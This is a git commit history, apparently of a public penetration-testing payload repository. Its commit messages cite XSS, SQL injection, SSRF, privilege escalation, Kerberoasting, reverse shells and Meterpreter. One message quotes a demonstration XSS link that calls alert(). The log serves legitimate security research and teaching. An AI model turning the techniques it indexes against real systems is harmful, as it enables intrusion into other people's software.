Swissky	2d5b4f2193	Meterpreter generate + LaTeK XSS + Ruby Yaml	2019-03-03 16:31:17 +01:00
Swissky	6d2cd684fa	Web cache deception resources update	2019-03-01 17:49:19 +01:00
Swissky	70225232c9	Polyglot Command Injection + XSS HTML file	2019-02-28 00:36:53 +01:00
Swissky	a58a8113d1	Linux capabilities - setuid + read / Docker group privesc	2019-02-26 17:24:10 +01:00
Swissky	abb81aba7e	Merge pull request #46 from 0xInfection/patch-2 Added a new bypass variant + fixed a payload	2019-02-20 08:14:27 +01:00
Infected Drake	4187f87d0d	Added a new bypass variant + fixed a payload	2019-02-20 11:17:49 +05:30
Swissky	79f2c52ef5	EICAR file	2019-02-19 21:06:23 +01:00
Swissky	c14fe62d0a	Merge pull request #43 from cclauss/print-function Use print() function in both Python 2 and Python 3	2019-02-19 21:01:14 +01:00
Swissky	a4e695a92e	Merge pull request #44 from annnoo/patch-1 Fixed Hack The Box-Link	2019-02-18 13:47:12 +01:00
Anno	119c4f4712	Fixed Hack The Box-Link Fixed Hack The Box-Link	2019-02-18 13:08:45 +01:00
cclauss	a3ee78fb80	Use print() function in both Python 2 and Python 3	2019-02-17 23:47:18 +01:00
Swissky	4e17443d62	SQL injection - MySQL version for error based	2019-02-17 22:56:09 +01:00
Swissky	40f86d39b0	MYSQL - Extract data without columns name	2019-02-17 21:51:21 +01:00
Swissky	78c882fb34	Jenkins Grrovy + MSSQL UNC + PostgreSQL list files	2019-02-17 20:02:16 +01:00
swisskyrepo	eac421432a	File upload - merging old files	2019-02-15 16:00:50 +01:00
swisskyrepo	88d5af0b19	JWT - Payload detail	2019-02-11 14:04:38 +01:00
Swissky	bb0177916d	Merge pull request #40 from Bo0oM/patch-1 Fix fake xss	2019-02-11 10:05:31 +01:00
Anton Lopanitsyn	200a2d38d8	Fix fake xss Actually, is not XSS. Running scripts like <a href="data:text/html,<script>alert(location.origin)</script>">clickme</a> have location.origin "null".	2019-02-11 09:34:13 +03:00
Swissky	f2273f5cce	PrivExchange attack	2019-02-10 19:51:54 +01:00
Swissky	8c1c35789d	SQLmap tamper update	2019-02-10 19:07:27 +01:00
Swissky	1c37517bf3	.git/index file parsing + fix CSRF payload typo	2019-02-07 23:33:47 +01:00
Swissky	8ff2aa8aff	Merge pull request #39 from n3v4/master Update exif_imagetype bypass	2019-02-07 14:01:43 +01:00
Vladislav Nechakhin	90db8b0f11	Update exif_imagetype bypass	2019-02-07 14:59:22 +07:00
Vladislav Nechakhin	7877647db1	Update exif_imagetype bypass	2019-02-07 14:51:03 +07:00
Swissky	357f8a69a8	Merge pull request #38 from n3v4/master Add exif_imagetype bypass	2019-02-02 11:36:22 +01:00
Vladislav Nechakhin	b30ac4e5bb	Add exif_imagetype bypass	2019-02-02 17:29:04 +07:00
Swissky	ffde81e2c0	Merge pull request #37 from marcan2020/patch-1 Update MSSQL Command execution	2019-01-29 23:14:09 +01:00
marcan2020	7068cb6edc	Update MSSQL Command execution	2019-01-29 15:25:25 -05:00
Swissky	20bf52eb6a	Bugfix 3 - removing the "-" in SSRF	2019-01-28 20:35:28 +01:00
Swissky	1f502ce20d	Bugfix 2 - Fixing git mess	2019-01-28 20:32:43 +01:00
Swissky	b9f2fe367c	Bugfix - Errors in stashed changes	2019-01-28 20:27:45 +01:00
Swissky	cd2d76d538	Merge pull request #36 from ThunderSon/patch-1 fead: add powerless repo to the tools	2019-01-28 08:16:38 +01:00
ThunderSon	99857a714f	fead: add powerless repo to the tools	2019-01-27 20:13:06 +02:00
Swissky	e07a654080	Command injection renamed + sudo/doas privesc	2019-01-22 21:45:41 +01:00
Swissky	4db45a263a	MSSQL union based + Windows Runas	2019-01-20 16:41:46 +01:00
Swissky	22c82cb277	Merge pull request #35 from noraj/patch-1 XSS using base64 encoded href data in a link	2019-01-17 19:54:37 +01:00
Swissky	ab6535c6d9	Bugfix picture SSRF	2019-01-13 22:28:49 +01:00
Swissky	1547338f84	SSRF exploitation and minor rewritting	2019-01-13 22:27:11 +01:00
Swissky	3bcd3d1b3c	SUID & Capabilities	2019-01-13 22:05:39 +01:00
Swissky	0070ac5dc4	Phar PHP shell files	2019-01-10 22:36:30 +01:00
Alexandre ZANNI	c7a292c19d	XSS using base64 encoded href data in a link	2019-01-10 18:24:43 +01:00
Swissky	ea0bddc18a	Windows RCE wildcard + XSS UI redressing	2019-01-08 20:49:05 +01:00
Swissky	2e3aef1a19	Shell IPv6 + Sandbox credential	2019-01-07 18:15:45 +01:00
Swissky	8b39647de6	AWS S3 and Open redirect rewritten	2018-12-29 13:05:29 +01:00
Swissky	67c644a300	Directory traversal / File inclusion rewritten	2018-12-28 00:27:15 +01:00
Swissky	e480c9358d	SQL wildcard '_' + CSV injection reverse shell	2018-12-26 01:02:17 +01:00
Swissky	bd97c0be86	README update + Typo fix in Active Directory	2018-12-25 20:41:43 +01:00
Swissky	d57d59eca7	NTLMv2 hash capturing, cracking, replaying	2018-12-25 20:35:39 +01:00
Swissky	d5478d1fd6	AWS Pacu and sections + Kerberoasting details	2018-12-25 19:38:37 +01:00
Swissky	82d4ff6c1d	References added based on @ngalongc bug-bounty-references	2018-12-25 16:10:15 +01:00
Swissky	b9efdb52d3	Linux - PrivEsc - First draft	2018-12-25 15:51:11 +01:00
Swissky	38c3bfbd9f	Windows Priv Esc - Unquoted Path, Password looting and Powershell version	2018-12-25 15:19:45 +01:00
Swissky	cdc3b5e080	XXE references + summary	2018-12-25 12:08:32 +01:00
Swissky	c25af52316	Blind XSS Angular JS	2018-12-24 15:09:43 +01:00
Swissky	a6475a19d9	Adding references sectio	2018-12-24 15:02:50 +01:00
Swissky	9c529535a5	CSRF - Fix image	2018-12-24 14:17:49 +01:00
Swissky	9c878f9b09	CSRF - First draft	2018-12-24 14:14:51 +01:00
Swissky	b4aff1a826	Architecture - Files/Intruder/Images and README + template	2018-12-23 00:45:45 +01:00
Swissky	e096d10a30	Merge pull request #34 from Fisjkars/master Add Springboot actuator intruder	2018-12-18 14:03:22 +01:00
Maxime Escourbiac	b59e24312e	Update Springboot readme	2018-12-18 11:18:50 +01:00
Fisjkars	5b7a3a95d3	Add Springboot Actuator management interface new file: Insecure management interface/README.md new file: Insecure management interface/intruders/springboot_actuator.txt	2018-12-18 11:05:15 +01:00
Swissky	69c1d601fa	Kerberoasting + SQLmap write SSH key	2018-12-15 00:51:33 +01:00
Swissky	8403068681	Merge pull request #32 from Meatballs1/Meatballs1-patch-1 Busybox httpd.conf file upload payload	2018-12-14 10:25:04 +03:00
Meatballs1	20c6bb2299	Update httpd.conf	2018-12-14 00:03:50 +00:00
Meatballs1	1d6b34ace5	Create README.md	2018-12-14 00:02:58 +00:00
Meatballs1	f1fec1c952	Create shellymcshellface.sh	2018-12-13 23:58:24 +00:00
Meatballs1	1e4e04831b	Create httpd.conf	2018-12-13 23:56:10 +00:00
Swissky	68325c8b98	Insecure deserialization Python	2018-11-27 23:04:17 +01:00
Swissky	c8d7575ba3	Minor edit in deserialization PHP and type juggling	2018-11-26 23:35:43 +01:00
Swissky	521d61d956	Attacks details + Summary JWT + XXE adjustments	2018-11-26 00:25:06 +01:00
Swissky	928a454531	Blind XSS endpoint + SSRF Google + Nmap subdomains	2018-11-25 15:44:17 +01:00
Swissky	b34cff5a74	XXE in docx, pptx, .. : Open XML files	2018-11-24 15:50:43 +01:00
Swissky	1225a9a23d	Metasploit Cheatsheet	2018-11-24 15:32:44 +01:00
Swissky	565b40d177	reGeorg + Meterpreter socks + S3 trick name	2018-11-24 13:49:08 +01:00
Swissky	0309a2efbd	Merge pull request #30 from m-veljkovic/master Update README.md	2018-11-19 14:01:44 +01:00
Milan Veljkovic	59d0020c86	Update README.md	2018-11-19 12:45:01 +01:00
Swissky	a0f8e846fa	Blind XSS - XSS Hunter, Sleepy Puppy etc	2018-11-18 15:37:01 +01:00
Swissky	fd99da6c06	Insecure source code - harvesting secrets	2018-11-18 14:12:05 +01:00
Swissky	5c1d025b03	README - CVE update	2018-11-18 13:40:47 +01:00
Swissky	7096b813ec	Insecure direct object references - IDOR	2018-11-17 17:08:46 +01:00
Swissky	182db99e13	Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings	2018-11-17 14:41:40 +01:00
Swissky	133518a78b	Merge pull request #28 from om3rcitak/patch-1 add new attack patterns from Daniel miessler	2018-11-16 13:49:35 +01:00
omer citak	081df9b24d	add new attack patterns from Daniel miessler https://github.com/danielmiessler/SecLists/edit/master/Fuzzing/Polyglots/XSS-Polyglots.txt new attack patterns: line 1, 2, 3.	2018-11-16 14:45:51 +03:00